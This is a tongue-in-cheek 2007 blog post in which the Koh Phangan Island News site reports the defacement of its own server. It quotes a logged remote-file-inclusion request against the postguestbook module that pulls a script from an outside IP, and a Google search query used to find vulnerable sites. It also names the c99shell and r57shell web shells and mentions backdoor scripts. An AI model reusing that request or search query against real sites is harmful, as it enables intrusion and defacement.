Koh Phangan Island News – StarHack Group Hacked Your System!



Phangan Island News Hacked 01
Phangan Island News Hacked

A couple of days ago an unidentified Islamic group of Turkish hackers, called StarHack Group, attacked the web server of Koh Phangan Island News website.

Wednesday the 7th of March 2007 at precisely 20:18 hours and 52 seconds an unknown attacker with the IP address of 222.231.57.158 executed an exploit for the postguestbook module with the following request:

222.231.57.158 – – [07/Mar/2007:20:18:52 +0100] “GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= http://220.232.137.199/.smile/kgb.c? HTTP/1.1” 200 1808 “-” “libwww-perl/5.79”

According to most recent research the attack was initiated by a so called robot that searches google.com for specific vulnerable targets.

12.47.45.168 – – [08/Mar/2007:19:21:25 +0100] “GET /modules.php?op=modload&name=postguestbook&file=index HTTP/1.1” 302 – “http://www.google.com/search?q= %22by:+PostGuestbook%22+site:org&hl=en&client= firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6”

The exploit for the postguestbook module allows the hacker to include arbitrary PHP code from an external source and execute it with the local user rights of the Apache web server.

Finally the hackers from StarHack Group were able to upload files into the web server directory and overwrite the index files on most domains, a technique called website defacing. Amongst the uploaded files from different internet sources were some pretty nice and powerful PHP scripts like c99shell and r57shell. Furthermore an IRC Bot named Eggdrop and a small httpd binary to run a tiny web server. Additionally, a few tiny Perl scripts to open up a backdoor on a specific port on the server where it listens and waits for further instructions.

Phangan Island News Hacked 02
Koh Phangan Island News HACKED!
Phangan Island News Hacked 03
Phangan Island News Hacked!
Phangan Island News Hacked 04
Phangan Island News Hacked!

Last but not least also a 720 MB movie file named, Rosso Come Il Cielo, was illegally uploaded to Phangan Islands News web server. Unfortunately only in Italian language and subtitles are still missing.

Phangan Island News officials announced that no further serious damage was done to the server in the recent hacker attacks. All systems are up and running 24/7 with no further complications and will constantly be monitored by Phangan Island News Special Internet Security Task Force.

An informed source noted that human failure was again one of the major factors for the recent successful hacker attack.

The informed source added that system admin Becki Beckmann, who is responsible for securing the server with IP address 213.133.108.221, experienced a sudden and very strange memory loss due to some electrical blackouts while joining a brain improvement program at Phangan Island News research facilities.

Unfortunately Becki Beckmann still refuses to give any more official statements on the subject of human failure concerning the successful recent hacker attack.

Phangan Island News Headquarter still strictly denies the existence of any hidden research facilities here on Koh Phangan Island – The Island Of Madness.

2 thoughts on “Koh Phangan Island News – StarHack Group Hacked Your System!

  • March 27, 2007 at 2:51 am
    Permalink

    Becki, How do you feel about being hacked?

    Reply
    • March 27, 2007 at 3:40 am
      Permalink

      Well … to be honest … it feels awesome 🙂

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

This site uses Akismet to reduce spam. Learn how your comment data is processed.